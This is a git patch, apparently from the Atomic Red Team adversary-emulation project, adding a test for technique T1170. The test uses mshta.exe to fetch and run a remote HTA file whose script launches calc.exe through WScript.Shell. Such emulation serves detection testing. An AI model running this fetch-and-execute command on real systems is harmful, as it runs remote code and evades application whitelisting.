From 26e0f443b975bd84b80b4de9f415f6cbd1cce0fa Mon Sep 17 00:00:00 2001
From: Tony M Lambert <ForensicITGuy@users.noreply.github.com>
Date: Mon, 11 Nov 2019 08:45:07 -0600
Subject: [PATCH] T1170 remote hta (#633)

* T1170 Remote HTA test

* Generate docs from job=validate_atomics_generate_docs branch=t1170-remote-hta
---
 atomics/T1170/T1170.hta  | 12 ++++++++++++
 atomics/T1170/T1170.md   | 23 +++++++++++++++++++++++
 atomics/T1170/T1170.yaml | 18 +++++++++++++++++-
 atomics/index.md         |  2 ++
 atomics/index.yaml       | 36 ++++++++++++++++++++++++++++++++++--
 atomics/windows-index.md |  2 ++
 6 files changed, 90 insertions(+), 3 deletions(-)
 create mode 100644 atomics/T1170/T1170.hta

diff --git a/atomics/T1170/T1170.hta b/atomics/T1170/T1170.hta
new file mode 100644
index 00000000..59101b61
--- /dev/null
+++ b/atomics/T1170/T1170.hta
@@ -0,0 +1,12 @@
+<html>
+<head>
+<HTA:APPLICATION ID="AtomicRedTeam">
+<script language="jscript">
+        var c = "cmd.exe /c calc.exe"; 
+        new ActiveXObject('WScript.Shell').Run(c);
+</script>
+</head>
+<body>
+<script>self.close();</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index b90a6ac2..07e032d7 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -18,6 +18,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a
 
 - [Atomic Test #3 - Mshta executes VBScript to execute malicious command](#atomic-test-3---mshta-executes-vbscript-to-execute-malicious-command)
 
+- [Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-4---mshta-executes-remote-html-application-hta)
+
 
 <br/>
 
@@ -82,4 +84,25 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)
+Execute an arbitrary remote HTA.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta|
+
+#### Run it with `command_prompt`! 
+```
+mshta #{hta_url}
+```
+
+
+
 <br/>
diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 81ad4b11..5c77f4cd 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -51,4 +51,20 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
\ No newline at end of file
+      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+- name: Mshta Executes Remote HTML Application (HTA)
+  description: |
+    Execute an arbitrary remote HTA.
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    hta_url:
+      description: URL to HTA file for execution
+      type: string
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+  executor:
+    name: command_prompt
+    command: |
+      mshta #{hta_url}
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index 0d20e9d0..52300ebb 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -300,6 +300,7 @@
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
   - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -682,6 +683,7 @@
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
   - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: BloodHound [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 4e1bd378..02954daf 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8913,7 +8913,23 @@ defense-evasion:
       executor:
         name: command_prompt
         command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+    - name: Mshta Executes Remote HTML Application (HTA)
+      description: 'Execute an arbitrary remote HTA.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        hta_url:
+          description: URL to HTA file for execution
+          type: string
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+      executor:
+        name: command_prompt
+        command: 'mshta #{hta_url}'
   T1096:
     technique:
       x_mitre_data_sources:
@@ -19406,7 +19422,23 @@ execution:
       executor:
         name: command_prompt
         command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")'
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
+'
+    - name: Mshta Executes Remote HTML Application (HTA)
+      description: 'Execute an arbitrary remote HTA.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        hta_url:
+          description: URL to HTA file for execution
+          type: string
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
+      executor:
+        name: command_prompt
+        command: 'mshta #{hta_url}'
   T1086:
     technique:
       x_mitre_permissions_required:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 3a35379e..1f5dcc1a 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -100,6 +100,7 @@
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
   - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -544,6 +545,7 @@
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta calls a local VBScript file to launch notepad.exe [windows]
   - Atomic Test #3: Mshta executes VBScript to execute malicious command [windows]
+  - Atomic Test #4: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: BloodHound [windows]